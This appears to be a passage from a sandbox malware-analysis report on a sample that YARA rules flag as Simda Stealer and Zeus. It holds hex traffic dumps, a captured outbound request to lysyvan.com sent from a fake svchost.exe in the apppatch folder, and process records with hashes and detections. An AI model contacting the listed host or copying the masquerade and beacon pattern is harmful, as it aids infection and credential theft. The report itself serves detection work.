                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66
                                                                                                                                                                                                          Data Ascii: lay:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;lef
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63
                                                                                                                                                                                                          Data Ascii: [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordion>sec


Session ID:7
Source IP:192.168.2.9
Source Port:57351
Destination IP:188.114.96.3
Destination Port:443
PID:1512
Process:C:\Windows\apppatch\svchost.exe
Timestamp:2024-09-08 08:54:08 UTC
Bytes transferred:267
Direction:OUT
Data:
GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
Timestamp:2024-09-08 08:54:09 UTC
Bytes transferred:904
Direction:IN
Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:09 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="41.6",amp_style_sanitizer;dur="20.5",amp_tag_and_attribute_sanitizer;dur="18.5",amp_optimizer;dur="4.0"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIX8x1dmnG5It6Kp6CiEM0LW%2BKc50WoLptehkIP0i06IHQ7yHjWWtnpyYF0OvrljK7OVBD7fC0HSM97fQzsp4cnEDx%2BbZf%2Fjc4aU%2Fkq%2B3fseHaoX5y%2FWYbiaJOAkhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb64e384a42f5-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400



                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:04:52:30
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\OjKmJJm2YT.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\OjKmJJm2YT.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:216'576 bytes
                                                                                                                                                                                                          MD5 hash:CA30350FDB8B854ABAC0A08AA08FF89A
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:04:52:31
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:216'576 bytes
                                                                                                                                                                                                          MD5 hash:3AFDB594A34F95485CA05A57DFEF80CC
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 772
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                          Start time:04:53:06
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                          Start time:04:53:06
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 736
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                          Start time:04:53:06
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 800
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                          Start time:04:53:07
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                          Start time:04:53:08
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                          Start time:04:53:08
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                          Start time:04:53:09
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                          Start time:04:53:09
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                          Start time:04:53:09
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                          Start time:04:53:10
                                                                                                                                                                                                          Start date:08/09/2024
